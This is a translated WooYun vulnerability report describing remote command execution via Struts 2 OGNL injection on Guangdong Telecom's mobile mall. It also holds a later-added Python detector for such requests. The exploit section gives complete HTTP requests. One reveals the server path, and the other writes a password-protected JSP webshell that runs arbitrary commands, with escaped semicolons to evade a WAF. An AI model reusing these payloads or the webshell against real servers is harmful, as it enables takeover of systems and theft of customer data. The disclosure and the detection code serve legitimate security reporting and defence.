
Vulnerability summary

Defect ID: wooyun-2015-0161987

Title: Guangdong Telecom mobile mall remote command execution (bypassing the WAF to get a shell)

Vendor: Guangdong Telecom

Author:

Submitted: 2015-12-17 10:42

Fixed: 2016-02-01 10:51

Published: 2016-02-01 10:51

Vulnerability type: command execution

Severity: high

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-12-17: Details notified to the vendor; awaiting vendor handling
2015-12-21: Vendor confirmed; details disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and relevant domain experts
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public

Brief description:

After my earlier report of command execution and getshell on the Guangdong Telecom government and enterprise customer system did not pass review, I found that the mobile mall also has a command execution problem; other systems may well be affected too...

Detailed description:

Visit the Guangdong Telecom official site http://**.**.**.**/ and click "天翼商城订单" (Tianyi Mall orders), as shown:

[Screenshot: QQ20151217-0@2x.jpg]


Capture the request and change it to a POST submission (this retrieves the server's deployment path):

POST /telOrder/searchOrderFirst.action?ssid=gdsb-syleft-wdxx-wddd-ddcx HTTP/1.1
Host: m.**.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: citrix_ns_id=ZjOcbelh7QKTodZs5ZkWLJeSK40A000; **.**.**.**_%2F_wlf=aWRf?dixY9fgviG7lVnF8o1NjENW6bA0A&TlNDX3h1LTIyMi42OC4xODUuMjI5?NsNVGZ1ouCBNq/CMOEeCK+p6z4YA&; **.**.**.**_%2F_wat=SlNFU1NJT05JRF9f?YtTo0DgicCbpr01IGjV0BQD5kH8A&; i_vnum=5; i_sq=eship-gdt-prd-new%3D%2526pid%253D**.**.**.**%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fm.**.**.**.**%25252FtelOrder%25252FsearchOrderFirst.action%25253Fssid%25253Dgdsb-syleft-wdxx-wddd-ddcx%2526ot%253DA; EmallSessionId=A905C5ADD287242233A04617D1698148; looyu_id=991fe062f0225303b3aebd4ce82c94ba27_39415%3A1; Hm_lvt_e1acdde81d08199bf8f8b416afd00f2f=1450280455,1450281244; Hm_lpvt_e1acdde81d08199bf8f8b416afd00f2f=1450281244; LATN_CODE_COOKIE=020; svid=7746D5EDA455CD4E; i_sess=%20ssid%3Dgdsb-syleft-wdxx-wddd-ddcx%3B; ijg=1450281244082; ijg_s=More%20than%207%20days; i_invisit=1; i_PV=m.**.**.**.**%2FtelOrder%2FsearchOrderFirst.action; i_url=%5B%5BB%5D%5D; i_cc=true; TS2c9cf1=9fe84fa7fcf2dfab51d71750e2d02da02e9c3c8821d1799c5671891c; adslAccount=; i_ppv=63; ecss_identity=81578062288320528943; looyu_39415=v%3A279a44548f85c9900534d438b4f536266d%2Cref%3Ahttp%253A//**.**.**.**/%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 258
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${#context.get("com.opensymphony.xwork2.dispatcher.HttpServletRequest").getRealPath("/")}"
-1
--------------------------5423a63046c50524a84963968721


Result of execution:

[Screenshot: QQ20151217-1@2x.jpg]


Next, write a small webshell (excuteMingl.jsp):

POST /telOrder/searchOrderFirst.action?ssid=gdsb-syleft-wdxx-wddd-ddcx HTTP/1.1
Host: m.**.**.**.**
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Referer: http://**.**.**.**/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: citrix_ns_id=ZjOcbelh7QKTodZs5ZkWLJeSK40A000; **.**.**.**_%2F_wlf=aWRf?dixY9fgviG7lVnF8o1NjENW6bA0A&TlNDX3h1LTIyMi42OC4xODUuMjI5?NsNVGZ1ouCBNq/CMOEeCK+p6z4YA&; **.**.**.**_%2F_wat=SlNFU1NJT05JRF9f?YtTo0DgicCbpr01IGjV0BQD5kH8A&; i_vnum=5; i_sq=eship-gdt-prd-new%3D%2526pid%253D**.**.**.**%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fm.**.**.**.**%25252FtelOrder%25252FsearchOrderFirst.action%25253Fssid%25253Dgdsb-syleft-wdxx-wddd-ddcx%2526ot%253DA; EmallSessionId=A905C5ADD287242233A04617D1698148; looyu_id=991fe062f0225303b3aebd4ce82c94ba27_39415%3A1; Hm_lvt_e1acdde81d08199bf8f8b416afd00f2f=1450280455,1450281244; Hm_lpvt_e1acdde81d08199bf8f8b416afd00f2f=1450281244; LATN_CODE_COOKIE=020; svid=7746D5EDA455CD4E; i_sess=%20ssid%3Dgdsb-syleft-wdxx-wddd-ddcx%3B; ijg=1450281244082; ijg_s=More%20than%207%20days; i_invisit=1; i_PV=m.**.**.**.**%2FtelOrder%2FsearchOrderFirst.action; i_url=%5B%5BB%5D%5D; i_cc=true; TS2c9cf1=9fe84fa7fcf2dfab51d71750e2d02da02e9c3c8821d1799c5671891c; adslAccount=; i_ppv=63; ecss_identity=81578062288320528943; looyu_39415=v%3A279a44548f85c9900534d438b4f536266d%2Cref%3Ahttp%253A//**.**.**.**/%2Cr%3A%2Cmon%3Ahttp%3A//**.**.**.**/monitor
Content-Type: multipart/form-data; boundary=------------------------5423a63046c50524a84963968721
Content-Length: 604
--------------------------5423a63046c50524a84963968721
Content-Disposition: form-data; name="redirect:/${"x"+(new **.**.**.**.PrintWriter("/home/ecss/emallTelWeb8082/webapps/emallTelWeb/excuteMingl.jsp")).append("<%if(\"023\".equals(request.getParameter(\"pwd\"))){**.**.**.**.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"i\")).getInputStream()\u003bint a = -1\u003bbyte[] b = new byte[2048]\u003bout.print(\"<pre>\")\u003bwhile((a=in.read(b))!=-1){out.println(new String(b))\u003b}out.print(\"</pre>\")\u003b}%>").close()}"
-1
--------------------------5423a63046c50524a84963968721


It executed successfully:

[Screenshot: QQ20151217-2@2x.jpg]


Proof of vulnerability:

Visit the webshell that was just written:

http://**.**.**.**/emallTelWeb/excuteMingl.jsp


[Screenshot: QQ20151217-3@2x.jpg]


[Screenshot: QQ20151217-4@2x.jpg]


[Screenshot: QQ20151217-5@2x.jpg]

Remediation:

Upgrade Struts 2 to the latest version as soon as possible.
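Beyond the upgrade, a defender would want to spot this request shape on the wire. As an added example (not from the report or from the mall's code), the following Python checks a multipart body for field names that combine a Struts 2 action prefix with an OGNL expression, which is where both requests above place the payload; the sample body and all function names are constructed.

```python
import re

# Parameter prefixes that old Struts 2 versions evaluated as OGNL; "redirect:"
# is the one in the requests above. OGNL_RE lists expression openers and
# context references; NAME_RE is greedy because the injected name has quotes.
PREFIX_RE = re.compile(r"^(redirect|redirectAction|action):", re.IGNORECASE)
OGNL_RE = re.compile(r"(\$\{|%\{|#context|#_memberAccess|@[\w.]+@)")
NAME_RE = re.compile(r'name="(.*)"')
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")

def multipart_boundary(content_type):
    """Return the boundary from a Content-Type header, or None if absent."""
    m = re.search(r'boundary=("?)([^";]+)\1', content_type)
    return m.group(2) if m else None

def multipart_field_names(body, boundary):
    """Yield the raw name= attribute of every part's Content-Disposition."""
    for part in body.replace("\r\n", "\n").split("--" + boundary):
        head = part.split("\n\n", 1)[0]  # part headers only; value ignored
        for line in head.split("\n"):
            if line.lower().startswith("content-disposition:"):
                m = NAME_RE.search(line)
                if m:
                    yield m.group(1)

def suspicious_fields(content_type, body):
    """Return field names that carry a Struts prefix plus an OGNL expression.
    Java \\uXXXX escapes (the second request hides ';' as \\u003b) are
    decoded before matching so they cannot mask the markers."""
    boundary = multipart_boundary(content_type)
    if not boundary:
        return []
    hits = []
    for name in multipart_field_names(body, boundary):
        decoded = UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), name)
        if PREFIX_RE.match(decoded) and OGNL_RE.search(decoded):
            hits.append(name)
    return hits

# Constructed sample, not the captured request: the OGNL sits in the field
# name, a place a WAF that only inspects parameter values never examines.
SAMPLE_CT = "multipart/form-data; boundary=----xyz"
SAMPLE_BODY = (
    "------xyz\r\nContent-Disposition: form-data; "
    'name="redirect:/${#context.get(\\"x\\")}"\r\n\r\n-1\r\n'
    '------xyz\r\nContent-Disposition: form-data; name="ssid"\r\n\r\nabc\r\n'
    "------xyz--\r\n"
)
```

Run `suspicious_fields(SAMPLE_CT, SAMPLE_BODY)` against the sample to see the injected name reported while the legitimate `ssid` field is ignored.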

Copyright notice: when reposting, please credit the source @WooYun


Vulnerability response

Vendor response:

Severity: high

Vulnerability Rank: 11

Confirmed: 2015-12-21 18:28

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded via CNCERT to China Telecom Group Corporation, which will coordinate follow-up handling with the website's administration department.

Latest status:

None yet